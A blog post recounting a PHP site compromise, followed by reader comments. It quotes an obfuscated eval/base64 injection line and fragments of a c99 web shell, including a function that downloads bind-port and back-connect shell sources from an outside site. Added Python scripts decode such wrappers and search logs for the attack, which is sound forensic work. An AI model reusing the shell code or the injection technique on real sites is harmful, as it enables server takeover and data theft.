My site was attacked…here are the details

What you are about to read is arguably the number one problem with PHP and script-based sites. I can't communicate enough the importance of site security at both the HTTP and FTP protocol levels. Unlike other technologies, like Domino NSF, script-based web sites can easily be hacked by script monkeys. If you don't care about PHP sites and the different ways they can be hacked then please don't read this.

One day last week, I noticed the performance on my sites had severely degraded. I got several reports from people who frequent the sites saying they were down. I checked several different browsers and sure enough, there was something wrong with the site. I logged into the system to see if there were database problems, index problems or missing files and everything looked fine. I have three main sites that I use PHP on, two Drupal-based sites and one WordPress-based site. It looks like only one of the Drupal sites was attacked.

The attacker got into my system and added a single line of script code to every index.php that looked similar to this (encrypted code was much larger):

eval(gzinflate(base64_decode('80jNyclXyFTPVUhJTc5PSU0BAA==')));

The PHP payload is stored as a Base64 string that is decoded with base64_decode, decompressed with gzinflate (raw DEFLATE, no gzip header) and then handed to eval, so the real code never appears in the file in readable form. None of this is encryption; it is encoding plus compression, and anyone holding the string can reverse it offline without ever running it. The short sample above decodes to the harmless text Hello i'm decoded; the real payload was much larger. Once eval runs, the attacker's code executes with the web server's privileges and can do anything the PHP process can, but it gets better. I actually used an online utility to decode the final layer – check out this site.
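The safe way to look at a one-liner like this is to unwind it statically rather than paste it into a PHP interpreter. The script below is an added example, not code from the post or from the online utility the author used: it recognises the common wrapper chains (gzinflate, gzuncompress, base64_decode, str_rot13, strrev around an eval), undoes them innermost-first with Python's own decoders, and keeps peeling while the result is itself another wrapped eval, since droppers are often nested several layers deep. Run on the sample string quoted above it yields the short text that the sample actually carries; run on a real injected index.php it would yield the shell's PHP. The pack() helper only exists to build nested test input, and the IOC extraction is a plain URL regex.

```python
import base64
import codecs
import re
import zlib

# One entry per PHP wrapper seen in injected one-liners; each undoes that call.
# The chain is unwound innermost-first, and nothing is ever eval'd.
DECODERS = {
    "base64_decode": lambda b: base64.b64decode(re.sub(rb"\s+", b"", b)),
    "gzinflate":     lambda b: zlib.decompress(b, -15),   # raw DEFLATE, no zlib/gzip header
    "gzuncompress":  lambda b: zlib.decompress(b),        # zlib-wrapped stream
    "str_rot13":     lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
    "strrev":        lambda b: b[::-1],
}

WRAPPER_RE = re.compile(
    r"""eval\s*\(\s*
        (?P<chain>(?:(?:gzinflate|gzuncompress|base64_decode|str_rot13|strrev)\s*\(\s*)+)
        (?P<q>['"])(?P<payload>[^'"]*)(?P=q)
        \s*\)+\s*;?""",
    re.VERBOSE | re.IGNORECASE,
)

# The one-liner quoted in the post (the page's own short sample, not the real payload).
SAMPLE = "eval(gzinflate(base64_decode('80jNyclXyFTPVUhJTc5PSU0BAA==')));"


def unwrap_once(src):
    """Decode the first eval(<wrappers>('payload')) found in src, or return None."""
    m = WRAPPER_RE.search(src)
    if not m:
        return None
    chain = re.findall(r"[a-z0-9_]+", m.group("chain").lower())  # outermost call first
    data = m.group("payload").encode("latin-1")
    for fn in reversed(chain):          # PHP evaluates the innermost call first
        data = DECODERS[fn](data)
    return data.decode("latin-1")


def peel(src, max_layers=16):
    """Return every decoded layer of a nested eval chain, outermost first.
    Stops when no wrapper remains or max_layers is reached."""
    layers = []
    while len(layers) < max_layers:
        nxt = unwrap_once(src)
        if nxt is None:
            break
        layers.append(nxt)
        src = nxt
    return layers


def pack(php, depth=1):
    """Wrap php the way the attacker did, depth times (used only to build test input)."""
    for _ in range(depth):
        c = zlib.compressobj(9, zlib.DEFLATED, -15)           # raw DEFLATE like gzdeflate()
        raw = c.compress(php.encode("latin-1")) + c.flush()
        php = "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(raw).decode()
    return php


def iocs(layers):
    """URLs mentioned in any decoded layer: hosts to block and to search the logs for."""
    found = set()
    for text in layers:
        found.update(re.findall(r"https?://[A-Za-z0-9./_-]+", text))
    return sorted(found)


if __name__ == "__main__":
    for i, layer in enumerate(peel(SAMPLE), 1):
        print("layer %d: %r" % (i, layer))
```

Feed it the whole index.php rather than the cut-out string: the regex locates the wrapper wherever it sits, and the decoded layers are where the download URLs, trigger parameters and hard-coded passwords of the dropped shell turn up.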

The attacker put two PHP files (e2cd.php, f07.php) deep into my directory structure. They just happened to pick the TinyMCE plugin directory (which could itself have been the avenue of attack, more on that later). So what did these files do? They were a PHP web shell that gave a visitor to my site (when a specific URL was requested through index.php) a web UI of system tools on my server. The shell groups the files it can browse by extension, and maps some extensions to an interpreter so those files can be run directly:

    array("html","htm","shtml"),
  "txt"      => array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
  "exe"      => array("sh","install","bat","cmd"),
  "ini"      => array("ini","inf"),
  "code"     => array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
  "img"      => array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  "sdb"      => array("sdb"),
  "phpsess"  => array("sess"),
  "download" => array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
// Command template used to execute a file directly, keyed by extension; %f% is the file
$exeftypes = array(
  getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
  "perl %f%"                => array("pl","cgi")
);

The tools also allowed the viewer to iterate through databases and dump the contents of all tables it could find. This means it had to know where the DB was and the credentials to get in – I am still looking to figure out how/if they were able to actually do that.

The script references this site all over the place – http://ccteam.ru/files/c99sh_sources. It even fetches additional tools from that site on demand, bind-port and back-connect shells and a data pipe in both Perl and C, for the attacker to compile or run on the box:

// Downloads the source of one helper tool (bind-port shell, back-connect shell or
// data pipe, in Perl or C) from $c99sh_sourcesurl; returns FALSE for unknown names.
function c99getsource($fn)
{
    global $c99sh_sourcesurl;
    $array = array(
        "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
        "c99sh_bindport.c"  => "c99sh_bindport_c.txt",
        "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
        "c99sh_backconn.c"  => "c99sh_backconn_c.txt",
        "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
        "c99sh_datapipe.c"  => "c99sh_datapipe_c.txt",
    );
    $name = $array[$fn];
    if ($name)
    {
        return file_get_contents($c99sh_sourcesurl.$name);
    }
    else
    {
        return FALSE;
    }
}

So how could this have happened?

I think there are three possibilities:

  1. My FTP password was compromised, which I doubt because it's so crazy, or an account with my domain provider was compromised.
  2. PHP security flaw – I checked all of my parameters and they all appear fine.
  3. TinyMCE security flaw – I am still checking into this, I don’t think it’s likely. I did verify the plugins I am using have no known vulnerabilities but that isn’t saying much.
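Which of the three it was is something the logs can usually settle. The script below is an added example, not part of the original post: it walks a docroot for PHP files carrying the eval wrapper or c99 markers and reports both mtime and ctime (an attacker can reset mtime with touch(), but ctime cannot be set from user space short of changing the system clock), and it reads Apache combined-format access-log lines to find every request to the dropped file names and, per file, the window between the last 404 and the first 200. The file appeared inside that window; if the FTP or control-panel log shows a login and upload in it, that is possibility 1, while a POST to a TinyMCE or other plugin URL in the same window points at 2 or 3. The log lines, client IPs, timestamps and the TinyMCE path are constructed for the example; only the file names come from the post.

```python
import os
import re
import time

# Signatures of the injected one-liner and of a c99-style shell. The c99 marker strings
# are taken from the snippets quoted in the post; the eval regex is my own.
INJECTION_RE = re.compile(
    r"eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(", re.I)
C99_MARKERS = ("c99sh_sourcesurl", "c99getsource", "ccteam.ru", "$exeftypes")

# Apache combined log: ip ident user [time] "method path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

# Constructed access-log lines standing in for the real log (IPs, times and path invented).
SAMPLE_LOG = """\
203.0.113.7 - - [06/Apr/2011:02:11:03 +0000] "GET /sites/all/libraries/tinymce/plugins/e2cd.php HTTP/1.1" 404 281 "-" "Mozilla/5.0"
203.0.113.7 - - [06/Apr/2011:02:13:40 +0000] "POST /sites/all/libraries/tinymce/plugins/e2cd.php HTTP/1.1" 200 9820 "-" "Mozilla/5.0"
198.51.100.2 - - [06/Apr/2011:02:15:12 +0000] "GET /node/12 HTTP/1.1" 200 14873 "-" "Mozilla/5.0"
203.0.113.7 - - [06/Apr/2011:02:16:55 +0000] "POST /sites/all/libraries/tinymce/plugins/f07.php HTTP/1.1" 200 9911 "-" "Mozilla/5.0"
"""


def classify(text):
    """Why a PHP source looks hostile: 'eval-wrapper', 'c99 marker: ...', or None if clean."""
    if INJECTION_RE.search(text):
        return "eval-wrapper"
    for marker in C99_MARKERS:
        if marker in text:
            return "c99 marker: " + marker
    return None


def _utc(epoch):
    return time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(epoch))


def scan_tree(root, since_epoch=0):
    """Walk a docroot; return (path, mtime, ctime, reason) for suspicious PHP files
    touched after since_epoch, ordered by ctime (the timestamp an attacker cannot reset)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php3", ".php4", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            if max(st.st_mtime, st.st_ctime) < since_epoch:
                continue
            with open(path, "rb") as fh:
                reason = classify(fh.read().decode("latin-1"))
            if reason:
                findings.append((path, _utc(st.st_mtime), _utc(st.st_ctime), reason))
    return sorted(findings, key=lambda f: f[2])


def shell_requests(log_lines, shell_names):
    """Requests to any of the dropped file names, in log order: (ip, ts, method, name, status)."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        name = os.path.basename(m.group("path").split("?", 1)[0])
        if name in shell_names:
            hits.append((m.group("ip"), m.group("ts"), m.group("method"), name, int(m.group("status"))))
    return hits


def drop_window(hits):
    """Per shell name: (last 404 before it first answered 200, that first 200).
    The file was created between the two; a None lower bound means it was never seen missing."""
    window, last_404 = {}, {}
    for ip, ts, method, name, status in hits:
        if name in window:
            continue
        if status == 404:
            last_404[name] = ts
        elif status == 200:
            window[name] = (last_404.get(name), ts)
    return window


if __name__ == "__main__":
    import sys
    hits = shell_requests(SAMPLE_LOG.splitlines(), ("e2cd.php", "f07.php"))
    for h in hits:
        print("%s %s %s %s %d" % h)
    print(drop_window(hits))
    if len(sys.argv) > 1:                      # optional: scan a real docroot
        for f in scan_tree(sys.argv[1]):
            print("%s  mtime=%s ctime=%s  %s" % f)
```

Two things follow from this kind of triage. A 404 followed by a 200 from the same client for a file that should never have existed is the attacker checking whether the drop landed, and that client IP is what to search the rest of the log for, including the requests that arrived just before the window. And whatever the shell does, it does as the web-server user, so it can read anything the Drupal code can, sites/default/settings.php with the database credentials included; those credentials should be treated as disclosed and rotated regardless of how the entry was gained.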

Any and all comments or suggestions are welcome.

3 thoughts on "My site was attacked…here are the details"

  1. Hey Bob,

    I spotted this in my news feed and have several sources to point you towards for dealing with security flaws in TinyMCE. One of them was released only 19 hours ago.

    http://osvdb.org/show/osvdb/72116
    http://osvdb.org/show/osvdb/69990
    http://osvdb.org/show/osvdb/64215
    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1867

    In addition, there were patches to TinyMCE in WordPress 3.1.1

    http://blog.sucuri.net/2011/04/wordpress-3-1-1-is-available-security-fixes.html


  2. Consider this my "subscribe" to this post… Any news on the attack vector? What version of Drupal are you running? Did you post/search the Drupal boards for assistance? Was it indeed TinyMCE? If so, I'd strongly recommend switching to the YUI editor. (I'd recommend the YUI editor anyways…)

